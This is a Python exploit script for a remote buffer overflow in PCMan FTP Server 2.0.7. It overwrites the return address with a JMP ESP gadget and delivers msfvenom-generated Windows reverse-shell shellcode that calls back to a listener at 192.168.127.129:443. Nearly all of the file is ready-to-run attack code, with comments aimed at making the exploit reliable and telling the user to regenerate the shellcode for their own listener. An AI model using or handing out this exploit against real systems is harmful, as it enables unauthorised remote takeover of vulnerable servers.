#!/usr/bin/env python
# Usage: python PCManFTPServer2.0.7-RemoteBufferOverflow.py <target> <port>
import socket, sys
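# Payload layout: filler up to the saved return address, the overwritten EIP
# pointing at a JMP ESP gadget, a NOP sled, the encoded shellcode, then a
# short trailing NOP pad.  Every piece is bytes so the exact byte values reach
# the wire on both Python 2 and Python 3 -- with str literals Python 3 would
# UTF-8-encode the payload and corrupt every byte above 0x7f, and
# socket.send() would refuse the str outright.
junk = b'\x41' * 2006
# JMP ESP in SHELL32.dll at 7CB32F34, little-endian.  The address is specific
# to Windows XP SP3 English; any other build or language pack needs a new gadget.
eip = b'\x34\x2F\xB3\x7C'
nop = b'\x90' * 15
# Characters the encoder was told to avoid (the -b list below).  build_payload()
# refuses to send anything containing them, so a regenerated shellcode that
# forgot the -b list fails here instead of silently failing on the target.
bad_chars = b'\x0a\x0d\xff\x00'
# msfvenom -p windows/shell_reverse_tcp LHOST=192.168.127.129 LPORT=443 -b '\x0a\x0d\xff\x00' -f c
# LHOST/LPORT are baked into these bytes: regenerate for your own listener.
shellcode = (b"\xba\xc5\x95\x39\x1d\xdb\xcc\xd9\x74\x24\xf4\x58\x29\xc9\xb1"
b"\x52\x83\xe8\xfc\x31\x50\x0e\x03\x95\x9b\xdb\xe8\xe9\x4c\x99"
b"\x13\x11\x8d\xfe\x9a\xf4\xbc\x3e\xf8\x7d\xee\x8e\x8a\xd3\x03"
b"\x64\xde\xc7\x90\x08\xf7\xe8\x11\xa6\x21\xc7\xa2\x9b\x12\x46"
b"\x21\xe6\x46\xa8\x18\x29\x9b\xa9\x5d\x54\x56\xfb\x36\x12\xc5"
b"\xeb\x33\x6e\xd6\x80\x08\x7e\x5e\x75\xd8\x81\x4f\x28\x52\xd8"
b"\x4f\xcb\xb7\x50\xc6\xd3\xd4\x5d\x90\x68\x2e\x29\x23\xb8\x7e"
b"\xd2\x88\x85\x4e\x21\xd0\xc2\x69\xda\xa7\x3a\x8a\x67\xb0\xf9"
b"\xf0\xb3\x35\x19\x52\x37\xed\xc5\x62\x94\x68\x8e\x69\x51\xfe"
b"\xc8\x6d\x64\xd3\x63\x89\xed\xd2\xa3\x1b\xb5\xf0\x67\x47\x6d"
b"\x98\x3e\x2d\xc0\xa5\x20\x8e\xbd\x03\x2b\x23\xa9\x39\x76\x2c"
b"\x1e\x70\x88\xac\x08\x03\xfb\x9e\x97\xbf\x93\x92\x50\x66\x64"
b"\xd4\x4a\xde\xfa\x2b\x75\x1f\xd3\xef\x21\x4f\x4b\xd9\x49\x04"
b"\x8b\xe6\x9f\x8b\xdb\x48\x70\x6c\x8b\x28\x20\x04\xc1\xa6\x1f"
b"\x34\xea\x6c\x08\xdf\x11\xe7\xf7\x88\x66\x76\x9f\xca\x98\x79"
b"\xdb\x42\x7e\x13\x0b\x03\x29\x8c\xb2\x0e\xa1\x2d\x3a\x85\xcc"
b"\x6e\xb0\x2a\x31\x20\x31\x46\x21\xd5\xb1\x1d\x1b\x70\xcd\x8b"
b"\x33\x1e\x5c\x50\xc3\x69\x7d\xcf\x94\x3e\xb3\x06\x70\xd3\xea"
b"\xb0\x66\x2e\x6a\xfa\x22\xf5\x4f\x05\xab\x78\xeb\x21\xbb\x44"
b"\xf4\x6d\xef\x18\xa3\x3b\x59\xdf\x1d\x8a\x33\x89\xf2\x44\xd3"
b"\x4c\x39\x57\xa5\x50\x14\x21\x49\xe0\xc1\x74\x76\xcd\x85\x70"
b"\x0f\x33\x36\x7e\xda\xf7\x46\x35\x46\x51\xcf\x90\x13\xe3\x92"
b"\x22\xce\x20\xab\xa0\xfa\xd8\x48\xb8\x8f\xdd\x15\x7e\x7c\xac"
b"\x06\xeb\x82\x03\x26\x3e")


def build_payload():
    """Assemble the overflow buffer and check it against the bad-char list.

    Returns:
        bytes: ``junk + eip + nop + shellcode + nop``.

    Raises:
        ValueError: if any byte of ``bad_chars`` is present in the payload.
    """
    payload = junk + eip + nop + shellcode + nop
    # bytearray membership takes an int on both Python 2 and 3.
    present = bytearray(payload)
    for c in bytearray(bad_chars):
        if c in present:
            raise ValueError("payload contains bad char 0x%02x" % c)
    return payload


# Kept as a module-level name for anyone who imported `exp` from this script.
exp = build_payload()


def send_payload(target, port, timeout=10.0):
    """Connect to ``target:port``, consume the greeting, and send ``exp``.

    Args:
        target: host name or IP address of the FTP server.
        port: TCP port number (int).
        timeout: socket timeout in seconds, so an unreachable host fails
            instead of hanging the script forever.

    Returns:
        int: number of bytes sent (``len(exp)``).

    Raises:
        socket.error / OSError: on connect, read or write failure; the socket
            is closed on every path.
    """
    s = socket.create_connection((target, port), timeout)
    try:
        s.recv(1024)    # read the banner so the payload is the first command
        s.sendall(exp)  # send() may write only part of a buffer this size
    finally:
        s.close()
    return len(exp)


def main(argv):
    """Parse ``<target> <port>`` from ``argv`` and fire the exploit.

    Returns:
        int: process exit code (0 on send, 2 on bad arguments).
    """
    if len(argv) != 3:
        sys.stderr.write("Usage: %s <target> <port>\n" % argv[0])
        return 2
    try:
        port = int(argv[2])
    except ValueError:
        sys.stderr.write("port must be an integer, got %r\n" % (argv[2],))
        return 2
    send_payload(argv[1], port)
    # "Completed" only means the bytes left this host; success is a
    # connection on your listener, not this line.
    print("\nExploit Completed :)\n")
    return 0


if __name__ == "__main__":
    sys.exit(main(sys.argv))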